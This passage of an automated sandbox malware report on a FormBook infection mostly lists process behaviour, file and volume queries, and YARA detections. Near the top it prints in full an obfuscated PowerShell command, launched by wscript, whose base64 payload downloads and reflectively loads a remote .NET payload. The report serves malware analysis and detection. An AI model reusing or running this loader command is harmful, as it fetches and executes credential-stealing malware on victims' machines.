wdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

